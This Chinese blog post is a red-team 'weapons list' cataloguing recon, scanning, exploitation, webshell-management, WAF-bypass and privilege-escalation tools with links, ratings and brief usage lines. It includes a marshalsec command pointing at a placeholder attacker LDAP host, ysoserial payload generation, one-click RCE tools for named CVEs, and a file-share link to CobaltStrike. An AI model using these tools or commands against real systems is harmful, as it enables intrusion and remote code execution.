武器清单


一、攻防对抗实战

1.1 信息收集

1.1.1 综合资产测绘

1)被动资产测绘

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
FOFA https://en.fofa.info/ 9 被动资产测绘,数量比较全可以下载资产数据文件。 domain=”域名”
Netcraft https://sitereport.netcraft.com/ 6 被动资产测绘,数据不全。 http://域名
Shodan https://www.shodan.io/ 7 被动资产测绘 完整域名
Zoomeye https://www.zoomeye.org/ 8 被动资产测绘 domain=”域名”
Google https://www.google.com/ 7 被动资产收集 site:”域名”
Enscan_GO https://github.com/wgpsec/ENScan_GO 暂无 被动资产收集

2)主动资产测绘

以下工具通过主动扫描目标进行资产测绘,会产生大量攻击流量,慎用。

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
Goby https://gobysec.net/ 7 主动资产测绘
ARL https://github.com/Aabyss-Team/ARL 8 主动资产测绘 灯塔
Spray https://github.com/chainreactors/spray 8 目录扫描 mac已安装;win10攻防工具箱已集成; 命令行使用

3)主被动综合

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
mitan https://github.com/kkbo8005/mitan/releases 9 综合信息收集工具 win10攻防工具箱已集成; GUI开箱即用
Tscanplus https://github.com/TideSec/TscanPlus/ 9 综合信息收集工具 mac已安装;win10攻防工具箱已集成;但是key需要另外获取。 GUI开箱即用

1.1.2 Whois信息

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
chinaz https://whois.chinaz.com/ 7 whois信息收集 有时候信息不全

1.1.3 IP信息

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
chinaz https://ping.chinaz.com/ 8 判断是否有CDN
ip138 https://site.ip138.com/ 8 查询域名对应的ip
aizhan https://www.aizhan.com/ 8 域名/IP综合查询
Eeyes https://github.com/EdgeSecurityTeam/Eeyes 9 快速筛选真实IP并整理为C段
IP域名互查 https://github.com/MS02423/MS02423 暂无

1.1.4 子域名

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
chinaz https://ping.chinaz.com/ 8 判断是否有CDN 网页检索。
ip138 https://site.ip138.com/ 8 查询子域名及ip 网页检索。
subfinder https://github.com/projectdiscovery/subfinder 8 被动子域名挖掘 MyCyberSecurityToolBox已扩展集成。 subfinder.exe -d 域名 -sources fora,hunter,quake -v
Findomain https://github.com/Findomain/Findomain 8 域名信息收集 MyCyberSecurityToolBox已扩展集成。 findomain.exe -t htsc.com.cn

1.1.5 爬虫

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
katana https://github.com/projectdiscovery/katana 8 web爬虫 MyCyberSecurityToolBox已扩展集成。 katana -u urls.txt -proxy http://127.0.0.1:7777

1.1.6 js分析

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
jsfinder https://github.com/Threezh1/JSFinder 9 爬取网页/js中的子域名和url MyCyberSecurityToolBox已扩展集成。 python JSFinder.py -u URL链接
JSFinderPlus https://github.com/mickeystone/JSFinderPlus 9 爬取网页/js中的子域名和url MyCyberSecurityToolBox已扩展集成。 python JSFinderPlus.py -u URL链接 -d
Jsfinder油猴脚本 https://github.com/Threezh1/Deconstruct/tree/main/DevTools_JSFinder 9 爬取网页/js中的子域名和url MyCyberSecurityToolBox已扩展集成。 启动油猴脚本,访问页面,f12 在console中查看获取的子域名和链接。
URLFinder https://github.com/pingc0y/URLFinder 9 js URL提取 MyCyberSecurityToolBox已扩展集成。 URLFinder.exe -u 链接 -s all -m 2

1.1.7 资产探活

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
Web-SurvivalScan https://github.com/AabyssZG/Web-SurvivalScan 8 web资产探活。 MyCyberSecurityToolBox已扩展集成。 提供 web资产列表.txt 文件

1.1.8 指纹探测

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
EHole https://github.com/EdgeSecurityTeam/EHole 暂无 EHole(棱洞)3.0 红队重点攻击系统指纹探测工具。 MyCyberSecurityToolBox已扩展集成。 EHole.exe finger -l url.txt

1.1.9 威胁情报

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
vuln-crawler https://github.com/zero-typora/vuln-crawler 暂无 漏洞情报拉取 GUI

1.2 边界突破

1.2.1 端口扫描

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
nmap https://nmap.org/ 9 端口扫描,服务识别,操作系统识别 nmap ip -sV -sC -Pn -T 4 -p-

1.2.2 目录/API扫描

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
dirsearch https://github.com/maurosoria/dirsearch 9 目录扫描 python3.9及以上 python dirsearch.py -u http://172.20.10.2/
URLfinder https://github.com/pingc0y/URLFinder 7 URLFinder是一款快速、全面、易用的页面信息提取工具.用于分析页面中的js与url,查找隐藏在其中的敏感信息或未授权api接口。 更偏向于页面信息的深度提取,不是目录扫描。 go,可以直接下载release版使用 ./URLFinder -u http://172.20.10.2/ -s all -m 3 -o res.html
yjdirscan(御剑) https://github.com/foryujian/yjdirscan 7 目录扫描 win系统

1.2.3 漏洞扫描

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
Struts2VulsScanTools https://github.com/abc123info/Struts2VulsScanTools/releases/download/v19.32/Struts2_19.32.jar 【项目地址:https://github.com/abc123info/Struts2VulsScanTools】 7 struts漏洞检测
SpringBoot-Scan SpringBoot-Scan 暂无 spring信息泄漏及相关高危漏洞扫描 Mac已安装,win10攻防工具箱已集成。 python SpringBoot-Scan.py -h
heapdump_tool https://github.com/wyzxxz/heapdump_tool 【项目地址】 https://share.feijipan.com/s/dFAuqYQy 【下载地址】 暂无 spring heapdump文件敏感信息收集 已安装 usage: java -jar heapdump_tool.jar heapdump_filename
nuclei https://github.com/projectdiscovery/nuclei 8 综合漏扫 Mac已安装。win10攻防工具箱扩展集成。
pocsuite3 https://github.com/knownsec/pocsuite3 8 综合漏扫 Mac已安装。MyCyberSecurityToolBox已扩展集成(在SxkWorkStation上用conda虚拟环境安装后,复制pocsuite.exe文件到硬盘目录中)。
SpringBoot-Scan-GUI https://github.com/13exp/SpringBoot-Scan-GUI 暂无 spring信息泄漏及相关高危漏洞扫描 已安装 python main.py
dddd https://github.com/SleepingBag945/dddd 10但未经实战检验 信息收集+指纹识别+POC扫描+报告友好 mac已安装;MyCyberSecurityToolBox已扩展集成; https://github.com/SleepingBag945/dddd/blob/main/details.md 【详细用法】 dddd -t ‘icp.name=”xxxx有限公司”‘ -hunter -fofa -oip -fmc 1000【高效拉取资产数据】
SuperXray https://github.com/4ra1n/super-xray 暂无 信息收集+指纹识别+POC扫描+报告友好 mac已安装;win10攻防工具箱扩展集成(提示xray license过期); 开箱即用
weblogicScanner https://github.com/0xn0ne/weblogicScanner 6 weblogic漏洞扫描 mac已安装;win10攻防工具箱扩展集成 python ws.py -t 127.0.0.1
WeblogicTool 6 weblogic漏洞综合利用 win10攻防工具箱扩展集成 GUI开箱即用
Redis-unauth-scan https://github.com/KRookieSec/Redis-unauth-scan 7 Redis未授权访问漏洞扫描 MyCyberSecurityToolBox已扩展集成。
xray https://download.xray.cool/xray/1.9.4 8 漏洞扫描 MyCyberSecurityToolBox已扩展集成;mac已安装可使用。 xray webscan –listen 127.0.0.1:7777 –html-output res.html
afrog https://github.com/zan8in/afrog 暂无 漏洞扫描 MyCyberSecurityToolBox已扩展集成。
prismX https://github.com/yqcs/prismx 暂无 资产-指纹-漏扫 MyCyberSecurityToolBox已扩展集成。
Fscan https://github.com/shadow1ng/fscan 暂无 内网渗透;漏扫 MyCyberSecurityToolBox已扩展集成。 fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080
BBScan https://github.com/lijiejie/BBScan 暂无 信息泄露&目录遍历&管理后台&js-API&指纹识别 python BBScan.py -f urls.txt –api

1.2.4 漏洞利用工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
ShiroAttack2 https://github.com/SummerSec/ShiroAttack2 暂无 shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马) 已安装可运行 java -jar shiro_attack-4.7.0-SNAPSHOT-all/shiro_attack-4.7.0-SNAPSHOT-all.jar
RuoYiExploitGUI https://github.com/charonlight/RuoYiExploitGUI 暂无 若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具 已安装可运行 java -jar RuoYiExploitGUI_v1.0.jar
jmg https://github.com/pen4uin/java-memshell-generator 9 生成内存马 1)mac已下载可运行。2)win10攻防工具箱扩展集成可执行 。 java -jar /Users/xiaokaisi/Desktop/CyberSecurity/武器库/反序列化漏洞利用工具/jMG-gui-1.0.8.jar
geoserver.exe https://github.com/netuseradministrator/CVE-2024-36401 9 GeoServer-CVE-2024-36401-利用工具 Mac和win10攻防工具箱扩展集成可执行 。低版本jdk注入内存马 双击运行exe
GeoServer-Tools.jar https://github.com/bmth666/GeoServer-Tools-CVE-2024-36401 10 GeoServer-CVE-2024-36401-利用工具 Mac和win10攻防工具箱扩展集成可执行。jdk17注入内存马需要用提供jdk9+的javac编译工具代码。 java -jar GeoServer-Tools.jar
CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ 9 Apache-ActiveMQ-远程代码执行漏洞(CVE-2023-46604)反弹shell利用工具。 win10攻防工具箱扩展集成可执行。 见本站漏洞知识库之《Apache-ActiveMQ-远程代码执行漏洞(CVE-2023-46604)》
ActiveMQ_RCE_Pro_Max https://github.com/ImuSpirit/ActiveMQ_RCE_Pro_Max 9 Apache-ActiveMQ-远程代码执行漏洞(CVE-2023-46604)反弹shell利用工具。 mac和win10攻防工具箱扩展集成可执行。 见本站漏洞知识库之《Apache-ActiveMQ-远程代码执行漏洞(CVE-2023-46604)》
ysoserial https://github.com/frohoff/ysoserial 9 Java 反序列化漏洞利用payload生成 Mac;SecurityToolBox已扩展集成; D:jdk8\bin\java.exe -jar ysoserial-all.jar CommonsCollections1 ‘calc.exe’ > test.bin

1.2.5 webshell管理工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
AntSword(蚁剑) https://github.com/AntSwordProject/antSword 9 webshell管理
Godzilla(哥斯拉) https://github.com/BeichenDream/Godzilla 8 webshell管理
Behinder(冰蝎) https://github.com/rebeyond/Behinder 9 webshell管理

1.2.6 代理抓包工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
yakit https://yaklang.com/ 9 单兵工具平台
burpsuite https://portswigger.net/burp 9 单兵工具平台

1.2.7 插件类工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
findsomething https://chromewebstore.google.com/detail/findsomething/kfhniponecokdefffkpagipffdefeldb 7 前端信息提取 浏览器插件、已安装
HaE https://github.com/gh0stkey/HaE 暂无 前端信息提取 mac-burpsuite插件、已安装 https://www.ddosi.org/burpsuite-hae/】【 https://blog.zgsec.cn/archives/481.html】
APIKit https://github.com/API-Security/APIKit 暂无 API发现、扫描、审计 mac-burpsuite插件已安装 APIKit可以主动/被动扫描发现应用泄露的API文档,并将API文档解析成BurpSuite中的数据包用于API安全测试
nowafpls https://github.com/assetnote/nowafpls 暂无 绕WAF mac-burpsuite插件已安装 https://www.jython.org/download.html 【1)安全前需要设置jython; 2)插件py路径不能存在中文。】

1.2.8 弱口令扫描

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
week-passwd https://github.com/BBD-YZZ/week-passwd 暂无 一键检测13种服务:FTP、RDP、SSH、SMB、VNC、Redis、MySQL/MSSQL/Oracle、Telnet、Tomcat、MongoDB、WebLogic、PostgreSQL 限windows使用 https://mp.weixin.qq.com/s/BmsMBqIPF22SNOuA6ty05A

1.2.9 js逆向加解密工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
wt-js https://developer.aliyun.com/article/1134572 暂无 js逆向加解密 win10攻防工具箱扩展集成可执行。
Crypto Magician https://developer.aliyun.com/article/1134572 暂无 js逆向加解密 win10攻防工具箱扩展集成可执行。
乐易助手 https://developer.aliyun.com/article/1134572 暂无 js逆向加解密 win10攻防工具箱扩展集成可执行。

1.2.10 字典

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
fuzzDicts https://github.com/TheKingOfDuck/fuzzDicts 8 fuzz字典及工具 MyCyberSecurityToolBox已扩展集成
SecDictionary https://github.com/SexyBeast233/SecDictionary 暂无 实战沉淀字典

1.2.10 其他工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
jwt生成器 https://dinochiesa.github.io/jwt/ 9 jwt生成平台
JNDI-Injection-Exploit-Plus https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/releases/download/2.3/JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar 【下载地址】https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/tree/2.3【项目地址】 暂无 JNDI注入;生成反序列化链 mac已下载;MyCyberSecurityToolBox已扩展集成; https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/blob/2.3/README_zh.md
JNDI-Injection-Exploit https://github.com/welk1n/JNDI-Injection-Exploit 8 启动JNDI利用服务 MyCyberSecurityToolBox已扩展集成; java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
git-dumper https://github.com/arthaud/git-dumper 8 从站点dump git仓库 mac已安装 git-dumper http://192.168.52.13:1230/.git k8s-goat-git
trufflehog https://github.com/trufflesecurity/trufflehog 8 密钥发现、分类、验证和分析工具 mac已安装 trufflehog .
fuzzDicts https://github.com/TheKingOfDuck/fuzzDicts 8 fuzz字典及工具 MyCyberSecurityToolBox已扩展集成
marshalsec https://github.com/mbechler/marshalsec 暂无 生成反序列化 Payload MyCyberSecurityToolBox已扩展集成 java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream JNDI ldap://your.attacker.ip:1389/Exploit

1.3 内网攻防

1.3.1 权限提升

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
znlinux https://github.com/twowb/znlinux 暂无 linux全架构全漏洞提权程序 已下载未测试 ./znlinux_linux_amd64 -a

1.3.2 综合工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
CobaltStrike 3.14 链接: https://pan.baidu.com/s/1AW4nL_cJOsrO64xZQltMZA 提取码: yiqp 9 综合渗透 详见本站《CobaltStrike》
metasploit framework kali内置,https://www.metasploit.com/ 9 综合渗透 详见本站《MSF-Metasploit》
type:"POST"|type:"GET"|post("|get("|ashx?|ashx|ur1:|ur1:"|ur1:|path:|path:|path:|action?|data|params

1.4 综合工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
天狐渗透工具箱 百度网盘下载地址:https://pan.baidu.com/s/1MGZPpR-oFxGwDRlD-hLPNQ?pwd=ofox 官方GitHub地址:https://github.com/One-Fox-Security-Team/One-Fox-T00ls 暂无 综合工具箱 限于windows环境。已在win10虚拟机安装并逐步扩展工具库。
PotatoTool https://github.com/HotBoy-java/PotatoTool 暂无 红蓝攻防工具箱 1)mac已安装(jdk8)可执行;2)win10攻防工具箱自集成可执行。 java -jar PotatoTool-2.5-jdk8.jar
Rabbit TreasureBox 百度云 9 综合工具箱 MyCyberSecurityToolBox已扩展集成。
EasyTools https://github.com/doki-byte/EasyTools/archive/refs/tags/v1.7.5.zip 6 综合工具箱 MyCyberSecurityToolBox已扩展集成(作者未提供收集版)
DudeSuite https://github.com/x364e3ab6/DudeSuite 暂无 综合工具箱 MyCyberSecurityToolBox已扩展集成。

1.5 其他工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
Deadpool https://github.com/thinkoaa/Deadpool 10 fofa、hunter、quake拉取socks5代理,自动构建代理池。 MyCyberSecurityToolBox已扩展集成。【功能类似无影-轻武器库中的代理池工具。】

二、靶场综合渗透实战

三、漏洞挖掘

四、CTF实战

哈希破解工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
cmd5 https://www.cmd5.com/ 7 破解常见的md5值 有时需要付费

编码转换工具

工具简称 地址 个人推荐指数(满分10) 功能 备注 用法示例
tool.lu https://tool.lu/hexconvert/ 8 进制转换

文章作者: 司晓凯
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 司晓凯 !
  目录